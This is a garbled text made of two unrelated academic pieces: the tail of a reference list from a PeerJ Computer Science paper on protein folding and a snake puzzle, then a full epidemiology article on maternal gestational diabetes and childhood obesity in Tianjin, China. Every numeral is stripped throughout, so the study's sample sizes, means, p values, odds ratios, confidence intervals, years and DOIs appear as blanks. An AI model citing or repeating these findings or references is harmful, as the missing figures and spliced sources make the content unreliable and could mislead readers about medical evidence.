bloom jd, lu z, chen d, raval a, venturelli os, arnold fh. . evolution favors protein mutational robustness in sufficiently large populations. bmc biology ( ): doi . / - - - . bryngelson jd, wolynes pg. . spin glasses and the statistical mechanics of protein folding. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . chan hs, zhang z, wallin s, liu z. . cooperativity, local-nonlocal coupling, and nonnative interactions: principles of protein folding from coarse-grained models. physical chemistry ( ): – doi . /annurev-physchem- - . chothia c, lesk am. . the relation between the divergence of sequence and structure in proteins. the embo journal ( ): – . cooper s, khatib f, treuille a, barbero j, lee j, beenen m, leaver-fay a, baker d, popović z, players f. . predicting protein structures with a multiplayer online game. nature ( ): – doi . /nature . delano wl. . the pymol molecular graphics system. vol. . san carlos: delano scientific. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/insectopalo/snake-puzzle https://github.com/insectopalo/snake-puzzle http://dx.doi.org/ . /ipsjjip. . http://dx.doi.org/ . /molbev/msv http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . /wcms. http://dx.doi.org/ . /prot. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /annurev-physchem- - http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj-cs. derrida b. . random-energy model: an exactly solvable model of disordered systems. physical review b ( ): – doi . /physrevb. . . dokholyan nv, shakhnovich b, shakhnovich ei. . expanding protein uni- verse and its origin from the biological big bang. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . dougherty er, braga-neto u. . epistemology of computational biology: mathe- matical models and experimental prediction as the basis of their validity. journal of biological systems ( ): – doi . /s . drummond da, wilke co. . the evolutionary consequences of erroneous protein synthesis. nature reviews genetics ( ): – doi . /nrg . fortuna ma, zaman l, wagner ap, ofria c. . evolving digital ecological networks. plos computational biology ( ):e doi . /journal.pcbi. . fox ja, ouellette bff. . education in computational biology today and tomorrow. plos computational biology ( ):e doi . /journal.pcbi. . gallagher sr, coon w, donley k, scott a, goldberg ds. . a first attempt to bring computational biology into advanced high school biology classrooms. plos computational biology ( ):e doi . /journal.pcbi. . gardner m. . eleusis: the induction game. in: origami, eleusis, and the soma cubeg. new york: cambridge university press. gibas c, jambeck p. . developing bioinformatics computer skills. sebastopol: o’reilly media, inc. goldstein r. . the evolution and evolutionary consequences of marginal thermosta- bility in proteins. proteins : – doi . /prot. . hartmann ak. . spin glasses: the game. arxiv preprint. arxiv: . v . holm l, sander c. . protein structure comparison by alignment of distance matrices. journal of molecular biology ( ): – doi . /jmbi. . . holm l, sander c. . dali/fssp classification of three-dimensional protein folds. nucleic acids research ( ): – doi . /nar/ . . . humphrey w, dalke a, schulten k. . vmd—visual molecular dynamics. journal of molecular graphics : – doi . / - ( ) - . illergård k, ardell dh, elofsson a. . 
structure is three to ten times more conserved than sequence—a study of structural response in protein cores. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . ivankov d, garbuzynskiy s, alm e, plaxco k, baker d, finkelstein a. . con- tact order revisited: influence of protein size on the folding rate. protein science : – doi . /ps. . karplus m, ichiye t, pettitt b. . configurational entropy of native proteins. biophysical journal ( ): – doi . /s - ( ) - . kimura m. . a simple method for estimating evolutionary rates of base substitutions through comparative studies of nucleotide sequences. journal of molecular evolution ( ): – doi . /bf . nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /physrevb. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /s http://dx.doi.org/ . /nrg http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /prot. http://arxiv.org/abs/ . v http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /prot. http://dx.doi.org/ . /ps. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. lauring as, frydman j, andino r. . the role of mutational robustness in rna virus evolution. nature reviews microbiology ( ): – doi . /nrmicro . lazebnik y. . can a biologist fix a radio?-or, what i learned while studying apopto- sis. cancer cell ( ): – doi . /s - ( ) - . levinthal c. . how to fold graciously. mossbauer spectroscopy in biological systems : – . li h, helling r, tang c, wingreen n. . emergence of preferred structures in a simple model of protein folding. science ( ): – doi . /science. . . . liberles da, teichmann sa, bahar i, bastolla u, bloom j, bornberg-bauer e, colwell lj, de koning a, dokholyan nv, echave j, elofsson a, gerloff dl, goldstein ra, grahnen ja, holder mt, lakner c, lartillot n, lovell sc, naylor g, perica t, pollock dd, pupko t, regan l, roger a, rubinstein n, shakhnovich e, sjölander k, sunyaev s, teufel ai, thorne jl, thornton jw, weinreich dm, whelan s. . the interface of protein structure, protein biophysics, and molecular evolution. protein science ( ): – doi . /pro. . méndez r, fritsche m, porto m, bastolla u. . mutation bias favors protein folding stability in the evolution of small populations. plos computational biology ( ):e doi . /journal.pcbi. #close. minning j, porto m, bastolla u. . detecting selection for negative design in proteins through an improved model of the misfolded state. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . miyazawa s, jernigan rl. . residue–residue potentials with a favorable contact pair term and an unfavorable high packing density term, for simulation and threading. journal of molecular biology ( ): – doi . /jmbi. . . murzin ag, brenner se, hubbard t, chothia c. . scop: a structural classification of proteins database for the investigation of sequences and structures. journal of molecular biology ( ): – doi . /jmbi. . . noivirt-brik o, horovitz a, unger r. . trade-off between positive and negative design of protein stability: from lattice models to real proteins. plos computational biology :e doi . /journal.pcbi. . o’donoghue si, goodsell ds, frangakis as, jossinet f, laskowski ra, nilges m, saibil hr, schafferhans a, wade rc, westhof e, olson aj. . visualization of macromolecular structures. nature methods :s –s doi . /nmeth. . 
orengo c, michie a, jones s, jones d, swindells m, thornton j. . cath—a hierarchic classification of protein domain structures. structure ( ): – doi . /s - ( ) - . o’rourke j. . how to fold it: the mathematics of linkages, origami and polyhedra. new york: cambridge university press. ortiz ar, strauss ce, olmea o. . mammoth (matching molecular models obtained from theory): an automated method for model comparison. protein science ( ): – doi . /ps. . nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nrmicro http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /pro. http://dx.doi.org/ . /journal.pcbi. #close http://dx.doi.org/ . /prot. http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ps. http://dx.doi.org/ . /peerj-cs. pande vs, joerg c, grosberg ay, tanaka t. . enumerations of the hamilto- nian walks on a cubic sublattice. journal of physics a: mathematical and general ( ): – doi . / - / / / . pascual-garcía a, abia d, méndez r, nido gs, bastolla u. . quantifying the evolutionary divergence of protein structures: the role of function change and func- tion conservation. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . pascual-garcía a, abia d, ortiz Ár, bastolla u. . cross-over between discrete and continuous protein structure space: insights into automatic classification and networks of protein structures. plos computational biology ( ):e doi . /journal.pcbi. . porto m, roman he, vendruscolo m, bastolla u. . prediction of site-specific amino acid distributions and limits of divergent evolutionary changes in protein sequences. molecular biology and evolution ( ): – . rocha j, segura j, wilson rc, dasgupta s. . flexible structural protein align- ment by a sequence of local transformations. bioinformatics ( ): – doi . /bioinformatics/btp . sadreyev ri, kim b-h, grishin nv. . discrete-continuous duality of protein structure space. current opinion in structural biology ( ): – doi . /j.sbi. . . . Šali a, shakhnovich e, karplus m. . how does a protein fold? nature ( ): – doi . / a . sali a, shakhnovich e, karplus m. . kinetics of protein folding. a lattice model study of the requirements for folding to the native state. journal of molecular biology ( ): – doi . /jmbi. . . schneider mv, jimenez rc. . teaching the fundamentals of biological data integration using classroom games. plos computational biology ( ):e doi . /journal.pcbi. . schrödinger e. . what is life? with mind and matter and autobiographical sketches. new york: cambridge university press. searls db. . an online bioinformatics curriculum. plos computational biology ( ):e doi . /journal.pcbi. . sella g, hirsh ae. . the application of statistical physics to evolutionary biology. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . serohijos a, shakhnovich e. . merging molecular mechanism and evolution: theory and computation at the interface of biophysics and evolutionary population genetics. current opinion in structural biology : – doi . /j.sbi. . . . shakhnovich e, gutin a. . enumeration of all compact conformations of copolymers with random sequence of links. the journal of chemical physics ( ): – doi . / . . skolnick j, arakaki ak, lee sy, brylinski m. . the continuity of protein structure space is an intrinsic property of proteins. 
proceedings of the national nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /prot. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /bioinformatics/btp http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / a http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. academy of sciences of the united states of america ( ): – doi . /pnas. . soskine m, tawfik ds. . mutational effects and the evolution of new protein functions. nature reviews genetics ( ): – doi . /nrg . taketomi h, ueda y, gō n. . studies on protein folding, unfolding and fluctuations by computer simulation. international journal of peptide and protein research ( ): – . taverna dm, goldstein ra. . why are proteins marginally stable? proteins: structure, function, and bioinformatics ( ): – doi . /prot. . tirion mm. . large amplitude elastic motions in proteins from a single-parameter, atomic analysis. physical review letters ( ): – doi . /physrevlett. . . wallin s, farwer j, bastolla u. . testing similarity measures with continuous and discrete protein models. proteins : – . wilke co. . bringing molecules back into molecular evolution. plos computational biology ( ):e doi . /journal.pcbi. . zhang y, skolnick j. . tm-align: a protein structure alignment algorithm based on the tm-score. nucleic acids research ( ): – doi . /nar/gki . nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /nrg http://dx.doi.org/ . /prot. http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nar/gki http://dx.doi.org/ . /peerj-cs. : – j wang et al. gdm and offspring’s obesity research maternal gestational diabetes and different indicators of childhood obesity: a large study jing wang , , leishen wang , huikun liu , shuang zhang , junhong leng , weiqin li , tao zhang , nan li , wei li , andrea a baccarelli , lifang hou and gang hu tianjin women’s and children’s health center, tianjin, china chronic disease epidemiology laboratory, pennington biomedical research center, baton rouge, louisiana, usa department of environmental health sciences, columbia university mailman school of public health, new york, new york, usa department of preventive medicine, feinberg school of medicine, northwestern university, chicago, illinois, usa correspondence should be addressed to g hu: gang.hu@pbrc.edu abstract previous studies found conflicting results about the associations between the exposure to hyperglycemia in utero and the later risks of childhood overweight and obesity. the aim of the present study is to compare the children’s bmi growth between offspring exposed to maternal gestational diabetes mellitus (gdm) and those not exposed and assess the associations between maternal gdm and their offspring’s overweight and obesity risk. we performed a large observational study in women and their offspring ( gdm and non-gdm mother–child pairs, matched by their offspring’s gender and age). maternal gdm was diagnosed according to the world health organization criteria. childhood height, weight, waist circumference, body fat and skinfold were measured using standardized methods. 
after adjustment for maternal and children's characteristics, children born to mothers with gdm during pregnancy had higher mean values of z scores for bmi-for-age, z scores for weight-for-age, waist circumference, body fat, subscapular skinfold and suprailiac skinfold, in comparison with their counterparts born to mothers with normal glucose levels during pregnancy (all p values < . ). moreover, maternal gdm was associated with a higher risk of childhood overweight and obesity, with multivariate-adjusted odds ratios of . ( % confidence interval (ci): . – . ) and . ( % ci: . – . ), respectively, compared with the children of mothers without gdm during pregnancy. this study demonstrates that maternal gdm is an independent risk factor for childhood overweight and obesity and is associated with higher bmi in the offspring.

keywords: gestational diabetes mellitus; childhood obesity; maternal glucose levels; childhood growth; early childhood risk factors

introduction

the worldwide rise in over-nutrition, sedentary lifestyles and obesity has resulted in a steep increase in the number of women who develop gestational diabetes mellitus (gdm) during pregnancy ( ). nearly % of pregnancies in the united states were affected by gdm, which is defined as any degree of glucose intolerance with onset or first recognition during pregnancy ( ). the global prevalence of gdm ranged from . to . % ( ). women with prior gdm are known to have an increased risk of hypertensive disorders of pregnancy, the need for cesarean delivery, fetal macrosomia ( ) and the long-term risk of developing type diabetes in later life, compared with non-gdm women ( ). with respect to the long-term effects on the growth and development of children of gdm mothers, there are conflicting findings in previous studies. in the northwestern diabetes in pregnancy study in chicago, diabetes during pregnancy (gdm and preexistent diabetes) was positively associated with the offspring's bmi at birth and after years old ( , ). the offspring of pima indian women with preexistent diabetes and gdm had much higher rates of obesity at age – years, compared with their counterparts born to prediabetic and nondiabetic women ( , ). however, these differences may be due to the high type diabetes (t d) risk in the specialized population from the pima indians and a specialized pregnancy clinical population in chicago ( ). regarding the general population, two recent studies, from the hyperglycemia and adverse pregnancy outcome study (hapo) ( ) and kaiser permanente northwest and hawaii ( ), reported that maternal hyperglycemia during pregnancy increased the offspring's risk of overweight and obesity among -year-old girls and during the first decade among normal birth weight infants, respectively. however, other studies did not find a clear association between maternal gdm and obesity in offspring of more than years old ( , , ).
thus, more studies are expected to provide evidence and illustrate the impact of gdm on children's growth and development. the present study aims to compare different indicators of childhood obesity between offspring exposed to maternal gdm and those not exposed, and to assess the associations between maternal gdm and their offspring's overweight and obesity risk.

methods

gdm screening process

we used a two-step approach for the diagnosis of gdm in tianjin, china. we first invited all pregnant women (at – gestational weeks) to participate in a -h oral glucose tolerance test (ogtt) with a g glucose load in their community health centers. then, those whose glucose reading was ≥ . mmol/l were referred to the tianjin women's and children's health center to undergo a -h ogtt with a g glucose load. if the pregnant women met the world health organization (who) criteria for diabetes (fasting glucose ≥ mmol/l or -h glucose ≥ . mmol/l) or impaired glucose tolerance (igt) ( -h glucose ≥ . mmol/l and < . mmol/l), they were diagnosed as having gdm ( ). from , all pregnant women living in the six urban districts of tianjin have been screened for gdm ( ).

study population

we conducted a large study in gdm mother–child pairs and their counterparts with non-gdm mothers, matched by children's gender and age. the gdm mothers came from the tianjin gestational diabetes mellitus prevention program ( ), a randomized controlled trial conducted among gdm women living in the six urban districts of tianjin. a total of eligible women, who were diagnosed with gdm between and , were invited to join the program by mail. from august to july , a total of gdm women at – years postpartum finished the baseline survey. of them, were diagnosed as having type diabetes, and the remaining gdm women then attended the tianjin gestational diabetes mellitus prevention program. the recruitment, inclusion and exclusion criteria have been described in detail elsewhere ( ). we randomly chose gdm mother–child pairs who finished the year or follow-up survey and also had stored blood samples. simultaneously, we also enrolled non-gdm mother–child pairs, with age and sex frequency matched to the children of gdm mothers (fig. : flow chart of gdm screening, recruitment and enrolment of the case and control mother–child pairs). we collected written informed consent from all participants, and this study was approved by the human subjects committee of tianjin women's and children's health center.
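the two-step screening logic described in the methods can be sketched as follows. this is a hypothetical illustration, not the study's software: the numeric cut-offs are deliberately left as parameters rather than restating the values given above, and all function and variable names are invented for the example.

```python
from dataclasses import dataclass

@dataclass
class OGTT:
    fasting: float    # mmol/L, from the confirmatory OGTT
    two_hour: float   # mmol/L, from the confirmatory OGTT

def needs_referral(challenge_reading: float, screening_cutoff: float) -> bool:
    # Step 1: glucose challenge at the community health centre; readings at or
    # above the cut-off are referred for a confirmatory OGTT.
    return challenge_reading >= screening_cutoff

def is_gdm(ogtt: OGTT, dm_fasting_cutoff: float, dm_2h_cutoff: float,
           igt_2h_lower: float) -> bool:
    # Step 2: WHO criteria; either diabetes or impaired glucose tolerance
    # on the confirmatory OGTT counts as gestational diabetes.
    diabetes = ogtt.fasting >= dm_fasting_cutoff or ogtt.two_hour >= dm_2h_cutoff
    igt = igt_2h_lower <= ogtt.two_hour < dm_2h_cutoff
    return diabetes or igt
```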
mothers’ information was collected by a self- administered questionnaire, including socio-demographic characteristics, such as age, marital status, education (< , – , and ≥  years), family income (< , – and ≥ yuan/month), and occupation; pregnancy outcomes (prepregnancy weight, weight gain during pregnancy, gestational age and the number of births in the index pregnancy) and lifestyle in the past year, such as smoking status (non-smokers, former smokers and current smokers), passive smoking, drinking status, sitting time and leisure-time physical activity ( , – , and ≥ min/ day). children’s information was collected by another questionnaire completed by their mothers, including children’s general information, such as gender, birth date, age, birth weight, birth length, the mode of infant feeding within the first  months (exclusive formula, mixed breast and formula or exclusive breast) and lactation duration; history of diseases and medication; dietary habits (using a validated food frequency questionnaire (ffq) ( )) and routine activities (indoor and outdoor activities, screening watching time and sleep duration). all mother–child pairs underwent a physical examination. using the standardized protocol, all participants’ height and weight were measured in light indoor clothing and without shoes by trained research doctors. moreover, the children’s physical examination also included the measurement of body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold. body weight was measured with a beam balance scale to the nearest . kg; height was measured by a stadiometer to the nearest . cm. waist circumference was measured midway between the th rib and the top of the iliac crest to the nearest . cm. body fat was measured by a body composition analyzer (inbody j ) to the nearest . %. triceps skinfold, subscapular skinfold and suprailiac skinfold were measured by skinfold caliper to the nearest . cm. calculation of bmi bmi was obtained by dividing weight in kilograms by the square of height in meters. all mothers’ prepregnancy bmi calculation used their self-reported prepregnancy weight and their height. according to the chinese bmi cut-offs ( ), prepregnancy bmi was categorized as < , – . and ≥ kg/m . children’s bmi calculation used their body weight and height examined in the study visit. children’s z scores and overweight/obesity children’s z scores (including z scores for height-for- age (z-height), z scores for weight-for-age (z-weight), z scores for bmi-for-age (z-bmi)), calculated based on the protocol from the who, are gender-independent classification systems, representing equivalent height/ weight/bmi-for-age percentile based on the who growth reference ( ). children’s overweight and obesity was defined by children’s z-bmi: we defined normal weight as a bmi less than the th percentiles for age and gender based on the who growth reference (z-score < . ), overweight as a bmi above the th percentiles (z-score ≥ . ), and obesity as a bmi above the th percentiles (z-score ≥ . ) ( ). central obesity was defined as waist circumference ≥the th percentiles for age- and gender- specific distribution, according to the national health and nutrition examination survey (nhanes) iii ( ). high body fat was defined as body fat ≥the th percentiles of the nhanes iv ( ) (since the references were available from   years old, we defined high body fat only among the children over  years old). 
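the bmi and who z-score classifications described above reduce to a few lines of arithmetic. the sketch below is illustrative only; the z-score cut-offs for overweight and obesity are passed in as parameters rather than hard-coded, and the function names are invented for the example.

```python
def bmi(weight_kg: float, height_cm: float) -> float:
    # BMI = weight in kilograms divided by the square of height in metres.
    height_m = height_cm / 100.0
    return weight_kg / (height_m * height_m)

def weight_status(z_bmi: float, overweight_z: float, obesity_z: float) -> str:
    # Classify a child from the WHO BMI-for-age z-score, given the study's cut-offs.
    if z_bmi >= obesity_z:
        return "obesity"
    if z_bmi >= overweight_z:
        return "overweight"
    return "normal weight"

# e.g. weight_status(child_z_bmi, overweight_z=who_overweight_cutoff,
#                    obesity_z=who_obesity_cutoff)
```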
statistical analyses we used t-test and chi-square test to compare the general characteristics (continuous and categorical variables) of both mothers and children according to maternal gdm status. general linear models were applied to assess the differences in children’s z-bmi, z-weight, z-height, body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold according to maternal gdm status. cox proportional hazards models were used to estimate hazards ratios for children’s overweight, obesity, central obesity and high body fat according to maternal gdm status. the analyses included three multivariable adjusted models: model adjusted for maternal age, gestational age and education; model adjusted for the variables in model and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding method during the first   months after birth, children’s vegetables and fruits intake frequency, outdoor time, screen watching time and sleeping duration; model adjusted for the variables in model and also for maternal prepregnancy bmi and maternal gestational weight gain. all analyses were performed using ibm spss statistics . (ibm spss) with a statistical significance at . . this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : table maternal and children’s characteristics according to maternal gestational diabetes status. maternal and children’s characteristics non-gdm gdm p value number of subjects maternal characteristics age at delivery, years . ± . . ± . < . gestational age at delivery, weeks . ± . . ± . . prepregnancy bmi, kg/m . ± . . ± . < . prepregnancy bmi categories, % < . < . . . . – . . . ≥ . . gestational weight gain, kg . ± . . ± . < . education, % < . ≤  years . . –  years . . ≥  years . . current smokers, % . . . passive smokers, % . . . alcohol drinkers, % . . < . child characteristics boy, % . . . age, months . ± . . ± . . mode of infant feeding, % . exclusive breastfeeding . . mixed breast and formula . . exclusive formula feeding . . vegetables intake frequency, % < . ≤ time/day . . times/day . . ≥ times/day . . fruits intake frequency, % . < time/day . . time/day . . > time/day . . outdoor activity, h/day . ± . . ± . . screen watching time, h/day . ± . . ± . < . sleeping duration, % . ≤ h/day . . – h/day . . ≥ h/day . . birth bmi, kg/m . . < . height, cm ± . ± . . z-score for height-for-age . ± . . ± . . weight, kg . ± . . ± . . z-score for weight-for-age . ± . . ± . . body mass index, kg/m . ± . . ± . < . z-score for body mass index-for-age . ± . . ± . < . waist circumference, cm . ± . . ± . < . body fat, % . ± . . ± . < . triceps skinfold, mm . ± . . ± . . subscapular skinfold, mm . ± . . ± . < . suprailiac skinfold, mm . ± . . ± . < . overweight (z-bmi ≥ . ), % . . . obesity (z-bmi ≥ . ), % . . . central obesity, % . . . high body fat, % . . . values are means ± s.d. unless otherwise specified. gdm, gestational diabetes mellitus. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : results table  presents maternal and children’s characteristics according to maternal gdm status. compared with non- gdm mothers, gdm mothers were older at delivery, more overweight and obese before pregnancy, less current smokers and less alcohol drinkers and had less gestational weight gain and less education level. compared with children born to non-gdm mothers, children born to gdm mothers had higher birth bmi, longer screen watching time but shorter sleeping duration. after adjustment for maternal age, gestational age, education, current smoking status, passive smoking status, alcohol drinking status and children’s feeding method, children’s vegetables and fruits intake frequency, outdoor time, screen watching time and sleeping duration (multivariable-adjusted model ), children born to gdm mothers had higher mean values of z-bmi ( . vs . ), z-weight ( . vs . ), body fat ( . vs . %), waist circumference ( . vs . cm), subscapular skinfold ( . vs . mm) and suprailiac skinfold ( . vs . mm) than children born to non-gdm mothers (table  ). after additional adjustment for maternal prepregnancy bmi and gestational weight gain (multivariable-adjusted model ), these differences still remained significant. the multivariable-adjusted (model ) odds ratios among children of gdm mothers compared with children of non-gdm mothers were . ( % confidence interval (ci) . – . ) for overweight, . ( % ci . – . ) for obesity and . ( % . – . ) for high body fat, respectively (table  ). when further adjusting for maternal prepregnancy bmi and gestational weight gain, these associations were somewhat attenuated but remained significant. there was no significant association between gdm status and children’s central obesity. discussion in this large study, we found that children born to gdm mothers had higher z-weight, z-bmi, waist circumference, body fat, subscapular skinfold and suprailiac skinfold and were associated with increased risks of overweight, obesity and high body fat compared with children born to table comparison of children’s measurements according to maternal gestational diabetes status. children’s measurements multivariable-adjusted models non-gdm (n = ) gdm (n = ) p value z-score of bmi-for-age model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . model . ( . ) . ( . ) . z-score of weight-for-age model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . z-score of height-for-age model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . body fat, % model . ( . ) . ( . ) . model . ( . ) . ( . ) < . model . ( . ) . ( . ) . waist circumference, cm model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . triceps skinfold, mm model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . subscapular skinfold, mm model . ( . ) . ( . ) . model . ( . ) . ( . ) . model . ( . ) . ( . ) . suprailiac skinfold, mm model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . model . ( . ) . ( . ) < . data are means (s.e.). 
model adjusted for maternal age, gestational age, education, and children’s age; for z-score of bmi-for-age, z-score of weight- for-age and z-score of height-for-age, adjusted for maternal age, gestational age and education only. model adjusted for covariates in model and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding status, vegetables and fruits intake frequency, outdoor time, screening watching time and sleeping duration. model adjusted for in model and also for maternal prepregnancy bmi and weight gain during pregnancy. bmi, body mass index; gdm, gestational diabetes mellitus. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : non-gdm mothers. these associations were independent of maternal prepregnancy bmi, gestational weight gain and other related maternal and infant factors. as known in the previous studies, in utero exposure to gdm is a risk factor of macrosomia and large for gestational age at birth and developing obesity and type diabetes during adolescence or young adulthood in the offspring ( ). however, debates on the associations between maternal gdm status and childhood overweight and obesity risks have never stopped. studies of northwestern diabetes in pregnancy study in chicago ( , ), pima indian ( ), hapo in hongkong ( ) and kaiser permanente centers ( ) claimed to find a positive association between maternal gdm and childhood obesity, while other studies including one hapo study in uk argued that little association existed ( , , , , ). discrepancies in these findings may be due to small sample sizes of gdm-exposed children or research conducted among high type diabetes (t d) risk populations (pima indians and chicago study ( )). the present study included a large sample size of gdm and non-gdm mother–child pairs and had enough power to compare the differences of offspring’s growth between gdm and non-gdm exposure. also, we controlled various covariates in the multivariable-adjusted analysis, such as maternal social-economic characteristics, lifestyle factors, infant feeding status, children’s diet and lifestyle, maternal weight gain during pregnancy and prepregnancy bmi, which were identified as important confounders of this association ( ). evidence from human and animal research indicates that the environment in utero plays an important role on the growth of infants. the possible explanation underlying the findings could be ‘metabolic imprinting’, which is known as ‘the process by which a stimulus or insult occurring during a critical period of development has a long-term effect on the physiologic and metabolic responses of the offspring’ ( ). it represented a determinant of an over-nutritional status of fetus and further leading to offspring’s diseases later in life ( ). one of the underlying mechanisms may be the delivery of excessive nutrients from mothers to the fetus; maternal glucose but not insulin can cross the placenta which in turn influences the development of the fetus in utero and even long-term health ( ). 
previous animal models provided strong evidence that maternal diabetes increased the risks of offspring’s obesity and diabetes: gdm affected offspring’s obesity and insulin resistance in the livers, and further was associated with susceptibility to type diabetes mellitus ( , ). increasing obesity among children was also associated with lifestyle changes, such as over-nutrition and more sedentary time. in this study, we also found that children born to gdm mothers had longer screen watching time but shorter sleeping duration than their counterparts. in the analysis, we controlled these diet and lifestyle variables, but they may affect children’s overweight and obesity in the real world. we tried to assess children’s obesity in a more detailed way than previous studies, so we included not only bmi, weight, height, overweight and obesity, but also body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold as evaluating indicator of obesity. moreover, the data were based on the asian population, who are of increasing burden of childhood obesity and diabetes; as such identification and understanding of early life risk factors are particularly relevant. finally, maternal gdm was diagnosed based on the who criteria. there were several limitations in our study. one limitation of the study was that it was a cross-sectional study. thus, we could not make cause-and-effect inferences. second, maternal table odds ratios for childhood overweight, obesity, central obesity and high body fat by maternal gdm status. outcomes no. of cases/participants odds ratios ( % cis) model model model overweight non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) obesity non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) central obesity non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) high body fat non-gdm / . . . gdm / . ( . – . ) . ( . – . ) . ( . – . ) model adjusted for maternal age, gestational age, and education. model adjusted for covariates in model and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding method, vegetables and fruits intake frequency, outdoor time, screening watching time and sleeping duration. model adjusted for in model and also for maternal prepregnancy bmi and weight gain during pregnancy. ci, confidence intervals; gdm, gestational diabetes mellitus. this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : prepregnancy weight and gestational weight gain were based on self-reported data, which may introduce recall bias. nevertheless, validation studies in the united states and england have found good concordance between self-reported information during pregnancy and clinical records ( ). moreover, the children’s body measurements taken at different ages may conceal at what age this association between gdm and childhood overweight/ obesity becomes apparent. in conclusion, maternal gdm is an independent risk factor of childhood overweight and obesity, and it is associated with children’s faster growth of bmi. 
children who are exposed to hyperglycemia in utero have higher risks of becoming overweight and obese. therefore, for this high-risk population, appropriate intervention strategies are needed. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this study was supported by the tianjin women’s and children’s health center, tianjin public health bureau, european foundation for the study of diabetes (efsd)/chinese diabetes society (cds)/lilly programme for collaborative research between china and europe. dr hu was partly supported by the grant from the national institute of diabetes and digestive and kidney diseases (r dk ) and the national institute of general medical sciences (u gm ) of the national institutes of health. author contribution statement g h and j w designed this study. l w, h l, j l, s z and w l conducted the field research. j w, w l, t z and n l conducted data organization and analysis. j w drafted the manuscript. a a b, l h and g h critically reviewed and revised the manuscript. acknowledgements the authors would like to appreciate all the hard-working people from tianjin women’s and children’s health center dedicating to the tianjin gestational diabetes mellitus prevention program. references american diabetes association. gestational diabetes mellitus. diabetes care (supplement ) s –s . metzger be & coustan dr. summary and recommendations of the fourth international workshop-conference on gestational diabetes mellitus. the organizing committee. diabetes care (supplement ) b –b . zhu y & zhang c. prevalence of gestational diabetes and risk of progression to type diabetes: a global perspective. current diabetes 